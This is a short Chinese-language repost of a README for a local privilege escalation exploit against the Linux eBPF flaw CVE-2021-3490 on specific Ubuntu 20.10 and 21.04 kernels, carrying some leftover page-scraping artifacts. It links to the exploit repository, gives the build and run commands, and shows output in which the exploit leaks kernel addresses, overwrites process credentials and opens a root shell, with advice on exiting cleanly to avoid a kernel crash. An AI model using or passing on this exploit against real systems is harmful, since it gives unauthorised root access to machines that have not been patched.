针对 CVE-2021-3490 的 LPE 漏洞利用。在 Ubuntu 20.10 (Groovy Gorilla) 内核 5.8.0-25.26 到 5.8.0-52.58 上测试。和 Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17。
https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490
https://www.youtube.com/watch?v=EtQieYKtTY8
用法:
为 Ubuntu 20.10 (Groovy Gorilla) 构建:
代码语言:javascript复制make groovy
代码语言:javascript复制
为 Ubuntu 21.04 (Hirsute Hippo) 构建:
代码语言:javascript复制make hirsute
代码语言:javascript复制
运行:
代码语言:javascript复制bin/exploit.bin
[ ] eBPF enabled, maps created!
[ ] addr of oob BPF array map: ffffa008c1202110
[ ] addr of array_map_ops: ffffffff956572a0
[ ] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[ ] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[ ] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[ ] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[ ] success! enjoy r00t :)
#
代码语言:javascript复制
注意:您必须通过键入exit
执行清理并避免内核崩溃来干净地退出 root shell